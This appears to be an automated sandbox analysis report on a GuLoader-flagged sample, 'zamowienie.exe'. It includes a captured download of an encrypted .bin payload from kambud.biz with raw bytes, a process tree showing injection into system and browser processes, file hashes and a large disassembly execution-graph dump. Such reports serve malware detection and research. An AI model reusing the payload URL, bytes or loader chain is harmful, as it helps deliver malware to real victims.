                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 2d 76 34 70 75 4e 3d 74 65 2f 65 79 4d 47 66 6a 32 4c 65 76 51 44 74 75 70 62 45 63 34 49 76 67 6c 48 31 79 69 55 42 4e 37 58 55 7a 4a 78 52 79 4f 76 68 54 61 4b 6c 77 30 46 42 56 4f 32 79 62 38 43 6b 53 57 43 7a 6e 77 5a 52 43 5a 6b 64 57 61 62 6c 58 41 59 65 55 6b 4e 52 6a 59 30 49 35 72 79 31 71 37 57 79 42 78 65 51 69 53 73 41 62 54 46 63 62 63 6f 4b 4d 4d 6b 4c 44 50 41 45 4e 4f 67 4c 2b 47 39 4f 52 51 3d 3d 26 76 64 3d 66 68 55 6c 77 66 47 78 42 6e 2d 74 74 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-v4puN=te/eyMGfj2LevQDtupbEc4IvglH1yiUBN7XUzJxRyOvhTaKlw0FBVO2yb8CkSWCznwZRCZkdWablXAYeUkNRjY0I5ry1q7WyBxeQiSsAbTFcbcoKMMkLDPAENOgL+G9ORQ==&vd=fhUlwfGxBn-tt"}</script></head></html>


                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.549876185.17.43.2234431216C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-22 11:26:46 UTC172OUTGET /uCEVRNHZgMA26.bin HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                            Host: kambud.biz
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2024-10-22 11:26:47 UTC328INHTTP/1.1 200 OK
                                                                                                                                            Date: Tue, 22 Oct 2024 11:26:47 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                            Connection: Upgrade, close
                                                                                                                                            Last-Modified: Tue, 22 Oct 2024 10:10:30 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 287296
                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            2024-10-22 11:26:47 UTC7864INData Raw: 12 b7 69 60 8d d1 08 e9 7d 2c 29 64 ea 32 a2 73 48 d9 df a5 44 f7 89 a0 9a 31 0e 89 99 1a 17 a9 8d 9f 98 c2 ac 58 81 0f c6 cb e3 6c a5 5f d3 c5 29 8d 74 bc 95 42 c9 ea dc 9b 4c 40 7b f3 8f d5 0f 85 d5 a8 49 87 c2 bd 3a 65 a6 b7 c0 42 7f 12 07 73 1b 62 37 ad 07 78 28 1b 29 d5 c7 f6 ad 25 e9 8d 82 60 18 4b 7c 4d 31 e8 b9 8c 17 8a f6 7e 8f 1e 91 89 a0 44 d0 b3 61 2f e4 5c 9f eb 83 b8 c7 06 1b eb 6d 1f 16 11 59 5a e2 3b 54 d5 ad 8f e1 2c 77 69 db f3 c3 2f 27 b8 30 1b 95 69 94 2f b8 dc 0e 33 7b eb 8d 9b ea 0c 1d 0f 15 5e 3c 60 8a a4 ad 05 9e 21 ab e8 4a 53 40 2f d3 08 ab 06 26 28 45 3b 34 9a b7 9e cd 0b dc 6d 4b 84 8b 5b c0 8f bd 7a ff 37 8d 7b 5a c1 4a e3 6a 7e 68 8a 40 7b 70 66 84 25 e5 5f 7a d8 71 8d d0 c9 fe 13 9e 15 56 b1 20 bb 57 71 c1 bf 4c c6 1b ba 6b
                                                                                                                                            Data Ascii: i`},)d2sHD1Xl_)tBL@{I:eBsb7x()%`K|M1~Da/\mYZ;T,wi/'0i/3{^<`!JS@/&(E;4mK[z7{ZJj~h@{pf%_zqV WqLk
                                                                                                                                            2024-10-22 11:26:47 UTC8000INData Raw: d5 9c 6e 70 aa bd c2 63 f3 4e fc 16 88 7a e6 c8 4f 23 90 c3 da c3 d0 95 af ba 5f 95 37 5b aa ff 8a f9 f6 3b 1e 6a a0 96 8d ae 4e 59 8c 9d f2 42 4e f2 d9 21 34 d9 c9 27 b2 5e 10 2c 35 62 5b 0e 29 25 3b f3 37 39 ec f2 c0 5f b6 ef 75 66 90 21 64 e4 6d b2 e9 ee 46 42 77 67 23 bf 75 b7 e3 c8 2b b4 64 2b 6d bd a4 12 75 87 a6 22 82 52 ed 42 e5 60 9e 36 32 70 50 a2 07 a9 2f 0a 97 36 99 5c c4 38 fa 8e 38 f2 17 7b 6a 05 69 db a7 39 0f e6 4b 16 47 81 a3 27 66 7a b3 1c 04 12 ba f4 ee 39 ea 5b a8 50 7b 5c 6d b9 62 fc eb 86 da 96 27 f8 eb cd e0 42 e8 0f 70 47 3f ed f1 00 e7 3e 99 d5 3a 4c 13 a7 44 c6 f9 75 73 45 db 96 ef a4 f2 51 33 8d 87 65 23 38 68 46 20 63 a7 c4 df 75 96 60 55 8b 85 01 7d 6e 7b 80 ff 27 3a 95 08 6a 36 6c 66 b2 89 9c 3d 03 7e 69 01 d5 52 ce be 5a 67
                                                                                                                                            Data Ascii: npcNzO#_7[;jNYBN!4'^,5b[)%;79_uf!dmFBwg#u+d+mu"RB`62pP/6\88{ji9KG'fz9[P{\mb'BpG?>:LDusEQ3e#8hF cu`U}n{':j6lf=~iRZg
                                                                                                                                            2024-10-22 11:26:47 UTC8000INData Raw: 3d 23 c9 14 db eb 3a cf 4a cd 46 91 8e 79 41 09 aa 94 be 2e 2b 9e 7f fa 48 33 8f 30 6d 3a b7 ab 81 a1 2b 29 d8 a1 e1 2d ac a2 38 b7 39 79 63 c4 19 3d 9d f0 85 32 79 86 6c 0a 39 53 43 b5 5b b2 81 61 0b 01 41 23 0f c1 7c 96 46 fa e1 79 ba 11 ec 3e 74 a2 11 b7 aa 8f 14 18 aa 8a 19 5e 52 0c 95 35 19 36 87 0a 67 e4 c1 13 72 77 7a 64 4b dd c3 ae dc 30 aa f3 0b 8a 86 c6 23 7c d0 1c 94 01 15 ff 47 c0 7c 8a e8 b9 2c b2 95 9b 5d 23 b9 85 e0 f4 eb c9 ad 7e 27 bb e5 fd 3b 9e e8 16 a0 5e 5d e8 ed 0c c6 73 62 b8 5c 9a 28 4c 5d 2c 4b a5 38 c6 7a d2 b0 56 ae 06 7d e7 b2 e3 1c 5f 23 34 97 72 de 67 f7 f6 3b f6 84 33 24 0a 84 51 0a 66 af e3 31 74 f6 ab 9c 0c c3 98 06 a1 9c 2b c7 40 8f 3c 7b 0e 3f 55 2d 4c b9 ef 4b 27 48 48 f0 6e 40 00 19 e7 58 59 bf be a0 61 e6 c9 70 fe 9f
                                                                                                                                            Data Ascii: =#:JFyA.+H30m:+)-89yc=2yl9SC[aA#|Fy>t^R56grwzdK0#|G|,]#~';^]sb\(L],K8zV}_#4rg;3$Qf1t+@<{?U-LK'HHn@XYap
                                                                                                                                            2024-10-22 11:26:47 UTC8000INData Raw: 15 ec 70 ee ca 34 c4 35 60 78 c6 29 c1 b0 e6 29 ff 5e 0a 55 1c c4 6e 12 3b 99 7f 15 15 79 0f 81 b5 18 6c 57 5e 86 a0 4a 22 2b f7 39 75 0e 8f c5 e6 2a e1 b6 79 22 81 62 90 e0 ba 08 37 07 04 f6 c4 13 a9 ff 13 f8 1a 48 1a 3a 62 09 c7 b4 07 9f 12 81 8a 0e 0f 54 17 90 93 20 ab 88 00 a4 af 28 63 e6 8a f6 f6 3f 02 3e 37 fa fe 1c ec 97 5c 12 65 8a cb d6 80 a2 64 50 1a c9 df 03 c6 37 05 45 2a 5f 08 68 e2 b8 a7 c0 de 93 5b 02 fb 76 00 59 b8 a9 1d ae 6f 4c 59 5c cf 74 8e 28 75 db b1 ba 08 5a c9 9d 01 df cb 2f e0 07 05 d5 db 8a d0 72 cf 95 94 a0 af 3e 44 27 6c 37 09 17 40 f6 4c 83 62 7e 3a 66 5f 32 12 b4 54 7c 69 63 6b c7 da 33 3c 33 3a 7b 14 c7 92 f8 7a 19 2f 58 f1 69 27 66 be cf 62 f1 96 f4 97 32 ec d3 bc 97 8c d0 bf e4 7b a4 83 d8 61 88 d5 5d 5c 25 36 ce bb 38 49
                                                                                                                                            Data Ascii: p45`x))^Un;ylW^J"+9u*y"b7H:bT (c?>7\edP7E*_h[vYoLY\t(uZ/r>D'l7@Lb~:f_2T|ick3<3:{z/Xi'fb2{a]\%68I
                                                                                                                                            2024-10-22 11:26:47 UTC8000INData Raw: e7 fd b9 56 d3 e6 72 52 ee 4f b3 38 ea 92 0e c4 06 8b 4e 19 27 7b 3f 62 47 5f d6 3d a9 01 36 eb 62 c7 86 1b a4 be d4 87 26 ee 7c e4 12 7d 6e af 63 f2 61 5e 53 63 c0 9d 1b da d8 43 76 3e 34 5a 86 1f 1a c9 89 43 c7 05 ae fa 0e a6 52 67 24 eb e4 c4 b7 a9 50 fc 9b 9f 64 c8 14 f1 d2 7c 6e 72 0b a9 ce ea 04 24 69 a5 2c 49 40 43 2e e4 b1 dd 73 f6 eb 53 b4 0c 45 bc 71 c1 57 2f e1 12 3e 70 db 72 72 6b 27 66 23 bb 5c 83 6c e3 6a 7e 69 88 ee 70 8f 2b ae 89 91 54 78 bc 1a e5 ae fb 4a 6d cd b4 13 cf be b4 14 71 28 75 79 d3 3e 4f e3 ec 66 04 bb b0 94 07 36 34 78 f6 ca 7a 67 48 48 2d 6f 9d 82 01 83 ff ff 48 9c 11 e8 1f 2e 2e 03 f8 0c 41 f0 8b ac ab 50 8f 81 b8 af 43 fa 38 55 ff e4 f8 63 bc 1f 0f 04 ae 66 57 f0 92 95 97 b1 bf 9b 64 ab aa d7 42 e8 67 76 43 62 66 a9 66 82
                                                                                                                                            Data Ascii: VrRO8N'{?bG_=6b&|}nca^ScCv>4ZCRg$Pd|nr$i,I@C.sSEqW/>prrk'f#\lj~ip+TxJmq(uy>Of64xzgHH-oH..APC8UcfWdBgvCbff
                                                                                                                                            2024-10-22 11:26:47 UTC8000INData Raw: 35 35 2d 61 8c 76 93 98 c9 51 5c 43 4d fb 71 aa 1c 3d c9 f0 d5 73 f5 71 73 8e 9f fd 50 1b c8 ba 47 1c 16 1e 1c d5 08 5f f4 59 97 06 1e bc c7 dd 13 65 83 a4 ef 4a ee 03 d2 b4 ab c3 3b 08 42 87 03 b0 b3 cf 0e 13 60 ce 6b a6 f6 12 86 72 11 c2 01 30 16 2e 91 3d 34 08 79 6e 9f 46 f2 2d cb 92 be c0 eb bc 36 2b 40 b1 fb 73 f5 1c ee 7d 6b 68 48 7b c5 06 8b a6 df 9e 9e 3b 5b 73 44 c4 aa 10 ed f9 d2 d9 a8 0e cb 1d c7 a0 17 9f 78 d3 ee 6f 78 30 62 1d 1e 0b d6 7d eb de b6 b4 c2 f2 94 ea 3f 6f 7d 7f c7 7d a7 1e c6 93 65 fc 5d de de 5c ec 24 30 c8 32 65 a7 bd bf 9c 3b fc 12 f3 99 cd 91 7a a7 d8 df ee 5c 77 42 e3 5a 0e 07 50 fd df 83 8f 3f c5 a3 60 7d 01 60 f9 6b 71 a8 d8 df 9e 33 c7 db 12 0a 5b 9e b4 1b 2d b8 f5 b0 f6 f3 c9 a1 ef 9a fd 00 dc 54 91 3f e9 7f b8 b6 10 cd
                                                                                                                                            Data Ascii: 55-avQ\CMq=sqsPG_YeJ;B`kr0.=4ynF-6+@s}khH{;[sDxox0b}?o}}e]\$02e;z\wBZP?`}`kq3[-T?
                                                                                                                                            2024-10-22 11:26:47 UTC8000INData Raw: 4b 33 ef 0c bb c2 f5 a8 f1 cb fc 8c 83 d4 d3 47 81 64 8d 16 38 91 2d 05 d9 ec d3 92 e0 97 d7 db 92 e8 33 b9 82 34 bf 2d 37 21 90 32 4a 76 08 34 e3 63 67 ed 3e 29 35 3a 2b dc 60 69 19 dc 58 5c bd bb 73 8f 25 f6 92 10 ae 85 43 97 bf 05 15 d8 3d 32 be 4c 7e 16 55 ef f8 ce 09 c1 2f 2c 49 ec 4e 9e d2 94 4e f8 46 7c d4 58 0c 92 a8 f1 c5 a4 60 5a 8e 9e 34 72 e5 18 68 99 68 e1 4f 66 59 f4 83 14 26 ba 3b ee f3 5f d6 03 68 dd 6c 3c 7d 05 0f 43 fb 84 b5 ec 6e 73 37 cf 85 dc 54 a7 29 d8 72 ab d6 e8 84 ed c0 97 0a 5f 55 42 b7 fc bc 85 61 46 e1 54 ff 7a 33 88 8d 17 e7 eb ba 51 5a a9 28 0e 02 c9 a2 e1 6d c5 63 e2 6c ba 0d ed e6 15 ec 6a 1c 65 6f fa b2 43 fd bb 36 b1 c3 db af fe 1a 20 0d 87 18 89 5c 52 e4 57 b1 19 41 05 db 97 59 4b 91 de d1 8e f7 95 d6 d5 fe 63 cd 55 d6
                                                                                                                                            Data Ascii: K3Gd8-34-7!2Jv4cg>)5:+`iX\s%C=2L~U/,INNF|X`Z4rhhOfY&;_hl<}Cns7T)r_UBaFTz3QZ(mcljeoC6 \RWAYKcU
                                                                                                                                            2024-10-22 11:26:47 UTC8000INData Raw: 5f f6 33 98 1d f4 e6 5c 35 f4 a1 84 a3 97 95 73 ae 06 8c e2 4b 48 b8 a1 e7 99 13 21 41 c5 aa 99 e0 58 a3 0d 9a 82 5f 2b cf e5 58 d8 42 53 8e 94 79 8c ff 07 d5 5f ef 0a a4 71 8c 39 ed 80 03 06 81 6e 73 f7 e3 03 8f 46 43 aa 9a ed 79 93 f4 13 6d 36 c9 fc 85 cb 44 c4 97 1c 1c eb a9 a3 57 e8 ee f0 c2 dc 92 f2 c1 63 d3 1c 57 88 f2 24 c1 f0 03 cb 52 74 41 33 26 ed 27 ef 0e c1 3c 82 cd e2 d8 3b c5 e4 47 6c 87 6c e1 75 20 b9 56 5b 28 c3 84 48 73 d6 e6 03 29 7c 4d eb 5b 5c 09 10 31 a2 97 d7 70 97 8e 6b 08 71 e3 9d df 0f 40 a8 8d d1 89 33 30 12 29 d9 d9 97 c6 60 df 2b 61 8e f0 9a f0 db e5 48 41 93 9b ab 4d 8f e8 0a b2 83 43 fd f5 9e d2 6c b5 5e 6c 66 89 5d 11 16 db eb 5a c3 56 d0 83 12 cb bb 60 56 f6 d9 ff 37 a0 e3 cb 8b d9 47 a0 52 6f 2b 54 08 64 96 ed bd e6 0f 30
                                                                                                                                            Data Ascii: _3\5sKH!AX_+XBSy_q9nsFCym6DWcW$RtA3&'<;Gllu V[(Hs)|M[\1pkq@30)`+aHAMCl^lf]ZV`V7GRo+Td0
                                                                                                                                            2024-10-22 11:26:47 UTC8000INData Raw: 0c 04 09 6e ad 2c 18 b9 53 a6 69 a2 7d 1f 2f 28 6b 35 f5 be ae 91 d0 f6 4f 38 dd c1 5a 07 c4 bd 86 2e 93 fe 56 9f c8 de 57 6a da 29 9b a2 fc 4f f1 49 03 dc ba f0 31 bd ff c0 b9 16 4c cc 6e 1b 3a 38 d7 7a c8 95 96 5b e7 57 cf 35 09 d8 72 a9 c8 91 c3 36 08 2b c7 db fa e4 66 77 6c e7 6b 88 ce eb 89 88 b1 cc c6 1d 8c a6 a9 0c 9f 4b e0 3a c3 53 cc f6 75 51 e7 39 80 33 4c 8d 68 09 48 8d 2e a8 b3 98 e3 36 ba e2 66 5f 95 4f a8 00 15 2c 58 20 f7 47 46 5f 06 83 20 2d be bc 96 2a 28 70 75 26 0a b4 a5 79 d1 00 c7 bf e3 96 74 bc 25 62 75 eb 34 ce ed f2 ea 6d d0 66 a4 50 c8 80 63 f0 15 44 e9 62 b1 de 31 dd 24 ee 66 ea de 7a 04 53 9c 21 6d 75 af 06 31 a6 4f 9d 5e 80 17 55 9a a4 8b 8c 35 6a 99 88 66 25 d9 9f 3c 7e a3 62 54 5a 5b 31 aa 54 d0 22 77 ac 62 46 54 4d 3a 33 0a
                                                                                                                                            Data Ascii: n,Si}/(k5O8Z.VWj)OI1Ln:8z[W5r6+fwlkK:SuQ93LhH.6f_O,X GF_ -*(pu&yt%bu4mfPcDb1$fzS!mu1O^U5jf%<~bTZ[1T"wbFTM:3
                                                                                                                                            2024-10-22 11:26:47 UTC8000INData Raw: db 72 5c 3a 15 96 c9 50 b6 0f 63 be 3c b2 5a 3a 29 49 61 0d d9 f7 06 18 61 46 be 79 49 f9 85 8a 5e 3d 66 0f ab b4 8b 07 1f ad 46 dd 53 dd 8e 20 81 68 56 af 7f 2c d9 35 96 ad a2 6c db 68 e4 c0 57 0f eb 21 f6 a2 c9 3e 8f 51 fc 1a d6 4b 60 20 36 dc 15 bc cc c5 93 39 14 ab ed 8b 1d 19 db c7 1e 24 e5 d8 b8 9f 01 7d 79 a4 54 40 7a f8 24 ac cb 0f a9 8d b2 bc 0d 4d 67 86 da a6 f9 96 f1 e7 1c a8 3b a0 6a 91 0f a4 36 95 d3 0a 88 f1 6c 83 8e c6 fb c4 29 da dd 05 63 7a ae ec c1 ba 76 52 05 70 c8 18 82 bf 30 79 50 04 97 7b ba 7b 6f de 97 0d 18 0e 07 f1 68 71 2c 9c 40 ec b1 73 d6 9c 41 fc f6 7f ee a8 9b e8 96 94 ee bf cf 68 32 2b 0e 04 92 3b b6 ef c8 ac 6a 49 3e 8c c9 22 4e 07 f4 40 5f 61 24 a8 4b 41 13 7c 5b 40 62 13 8b 6b af 8e cd 71 ec 7b e8 e7 5c 8b 91 1e e5 51 3a
                                                                                                                                            Data Ascii: r\:Pc<Z:)IaaFyI^=fFS hV,5lhW!>QK` 69$}yT@z$Mg;j6l)czvRp0yP{{ohq,@sAh2+;jI>"N@_a$KA|[@bkq{\Q:


                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:07:25:54
                                                                                                                                            Start date:22/10/2024
                                                                                                                                            Path:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\zamowienie.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:775'216 bytes
                                                                                                                                            MD5 hash:48F82F781035DEF809B0CDB2F66097A9
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2435885467.0000000005488000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:07:26:33
                                                                                                                                            Start date:22/10/2024
                                                                                                                                            Path:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\zamowienie.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:775'216 bytes
                                                                                                                                            MD5 hash:48F82F781035DEF809B0CDB2F66097A9
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:07:27:16
                                                                                                                                            Start date:22/10/2024
                                                                                                                                            Path:C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe"
                                                                                                                                            Imagebase:0xd70000
                                                                                                                                            File size:140'800 bytes
                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:07:27:18
                                                                                                                                            Start date:22/10/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\verclsid.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\SysWOW64\verclsid.exe"
                                                                                                                                            Imagebase:0x3b0000
                                                                                                                                            File size:11'776 bytes
                                                                                                                                            MD5 hash:190A347DF06F8486F193ADA0E90B49C5
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:8
                                                                                                                                            Start time:07:27:32
                                                                                                                                            Start date:22/10/2024
                                                                                                                                            Path:C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe"
                                                                                                                                            Imagebase:0xd70000
                                                                                                                                            File size:140'800 bytes
                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:9
                                                                                                                                            Start time:07:27:44
                                                                                                                                            Start date:22/10/2024
                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                            Imagebase:0x7ff79f9e0000
                                                                                                                                            File size:676'768 bytes
                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Disassembly

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:21.9%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:17.2%
                                                                                                                                              Total number of Nodes:1578
                                                                                                                                              Total number of Limit Nodes:54
                                                                                                                                              execution_graph 5386 405640 5387 405662 GetDlgItem GetDlgItem GetDlgItem 5386->5387 5388 4057eb 5386->5388 5431 404493 SendMessageA 5387->5431 5390 4057f3 GetDlgItem CreateThread CloseHandle 5388->5390 5391 40581b 5388->5391 5390->5391 5393 405849 5391->5393 5394 405831 ShowWindow ShowWindow 5391->5394 5395 40586a 5391->5395 5392 4056d2 5397 4056d9 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5392->5397 5396 4058a4 5393->5396 5399 405859 5393->5399 5400 40587d ShowWindow 5393->5400 5433 404493 SendMessageA 5394->5433 5401 4044c5 8 API calls 5395->5401 5396->5395 5406 4058b1 SendMessageA 5396->5406 5404 405747 5397->5404 5405 40572b SendMessageA SendMessageA 5397->5405 5407 404437 SendMessageA 5399->5407 5402 40589d 5400->5402 5403 40588f 5400->5403 5408 405876 5401->5408 5410 404437 SendMessageA 5402->5410 5409 405502 28 API calls 5403->5409 5411 40575a 5404->5411 5412 40574c SendMessageA 5404->5412 5405->5404 5406->5408 5413 4058ca CreatePopupMenu 5406->5413 5407->5395 5409->5402 5410->5396 5415 40445e 22 API calls 5411->5415 5412->5411 5414 406451 21 API calls 5413->5414 5416 4058da AppendMenuA 5414->5416 5417 40576a 5415->5417 5418 4058f8 GetWindowRect 5416->5418 5419 40590b TrackPopupMenu 5416->5419 5420 405773 ShowWindow 5417->5420 5421 4057a7 GetDlgItem SendMessageA 5417->5421 5418->5419 5419->5408 5423 405927 5419->5423 5424 405796 5420->5424 5425 405789 ShowWindow 5420->5425 5421->5408 5422 4057ce SendMessageA SendMessageA 5421->5422 5422->5408 5426 405946 SendMessageA 5423->5426 5432 404493 SendMessageA 5424->5432 5425->5424 5426->5426 5427 405963 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5426->5427 5429 405985 SendMessageA 5427->5429 5429->5429 5430 4059a7 GlobalUnlock SetClipboardData CloseClipboard 5429->5430 5430->5408 5431->5392 5432->5421 5433->5393 5434 404c41 5435 404c51 5434->5435 5436 404c6d 5434->5436 5445 405ab8 GetDlgItemTextA 5435->5445 5438 404ca0 5436->5438 5439 404c73 SHGetPathFromIDListA 5436->5439 5441 404c8a SendMessageA 5439->5441 5442 404c83 5439->5442 5440 404c5e SendMessageA 5440->5436 5441->5438 5443 40140b 2 API calls 5442->5443 5443->5441 5445->5440 4172 4015c2 4176 402c5e 4172->4176 4175 4015db 4177 402c6a 4176->4177 4182 406451 4177->4182 4180 4015c9 SetFileAttributesA 4180->4175 4197 40645e 4182->4197 4183 40669f 4184 402c8b 4183->4184 4221 4063be lstrcpynA 4183->4221 4184->4180 4199 4066b8 4184->4199 4186 406676 lstrlenA 4186->4197 4189 406451 15 API calls 4189->4186 4191 40657d GetSystemDirectoryA 4191->4197 4192 406593 GetWindowsDirectoryA 4192->4197 4193 4066b8 5 API calls 4193->4197 4194 406451 15 API calls 4194->4197 4195 40661f lstrcatA 4195->4197 4197->4183 4197->4186 4197->4189 4197->4191 4197->4192 4197->4193 4197->4194 4197->4195 4198 4065f6 SHGetPathFromIDListA CoTaskMemFree 4197->4198 4208 4062a5 4197->4208 4213 4067e6 GetModuleHandleA 4197->4213 4219 40631c wsprintfA 4197->4219 4220 4063be lstrcpynA 4197->4220 4198->4197 4205 4066c4 4199->4205 4200 40672c 4201 406730 CharPrevA 4200->4201 4204 40674b 4200->4204 4201->4200 4202 406721 CharNextA 4202->4200 4202->4205 4204->4180 4205->4200 4205->4202 4206 40670f CharNextA 4205->4206 4207 40671c CharNextA 4205->4207 4229 405d7b 4205->4229 4206->4205 4207->4202 4222 406244 4208->4222 4211 406308 4211->4197 4212 4062d9 RegQueryValueExA RegCloseKey 4212->4211 4214 406802 4213->4214 4215 40680c GetProcAddress 4213->4215 4226 406778 GetSystemDirectoryA 4214->4226 4217 40681b 4215->4217 4217->4197 4218 406808 4218->4215 4218->4217 4219->4197 4220->4197 4221->4184 4223 406253 4222->4223 4224 406257 4223->4224 4225 40625c RegOpenKeyExA 4223->4225 4224->4211 4224->4212 4225->4224 4227 40679a wsprintfA LoadLibraryExA 4226->4227 4227->4218 4230 405d81 4229->4230 4231 405d94 4230->4231 4232 405d87 CharNextA 4230->4232 4231->4205 4232->4230 4233 401a43 4234 402c5e 21 API calls 4233->4234 4235 401a4c ExpandEnvironmentStringsA 4234->4235 4236 401a60 4235->4236 4238 401a73 4235->4238 4237 401a65 lstrcmpA 4236->4237 4236->4238 4237->4238 4239 402543 4250 402c9e 4239->4250 4242 402c5e 21 API calls 4243 402556 4242->4243 4244 402560 RegQueryValueExA 4243->4244 4248 4027ed 4243->4248 4245 402580 4244->4245 4246 402586 RegCloseKey 4244->4246 4245->4246 4255 40631c wsprintfA 4245->4255 4246->4248 4251 402c5e 21 API calls 4250->4251 4252 402cb5 4251->4252 4253 406244 RegOpenKeyExA 4252->4253 4254 40254d 4253->4254 4254->4242 4255->4246 4256 401744 4257 402c5e 21 API calls 4256->4257 4258 40174b SearchPathA 4257->4258 4259 401766 4258->4259 5451 401d44 5452 402c3c 21 API calls 5451->5452 5453 401d4b 5452->5453 5454 402c3c 21 API calls 5453->5454 5455 401d57 GetDlgItem 5454->5455 5456 40264d 5455->5456 5457 402ac5 SendMessageA 5458 402aea 5457->5458 5459 402adf InvalidateRect 5457->5459 5459->5458 5460 734018c7 5461 734018ea 5460->5461 5462 7340191a GlobalFree 5461->5462 5463 7340192c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5461->5463 5462->5463 5464 734012f6 2 API calls 5463->5464 5465 73401aae GlobalFree GlobalFree 5464->5465 5466 734016c8 5467 734016f7 5466->5467 5468 73401b28 18 API calls 5467->5468 5469 734016fe 5468->5469 5470 73401711 5469->5470 5471 73401705 5469->5471 5473 73401738 5470->5473 5474 7340171b 5470->5474 5472 734012f6 2 API calls 5471->5472 5477 7340170f 5472->5477 5475 73401762 5473->5475 5476 7340173e 5473->5476 5478 73401572 3 API calls 5474->5478 5480 73401572 3 API calls 5475->5480 5479 734015e9 3 API calls 5476->5479 5481 73401720 5478->5481 5482 73401743 5479->5482 5480->5477 5483 734015e9 3 API calls 5481->5483 5484 734012f6 2 API calls 5482->5484 5485 73401726 5483->5485 5486 73401749 GlobalFree 5484->5486 5487 734012f6 2 API calls 5485->5487 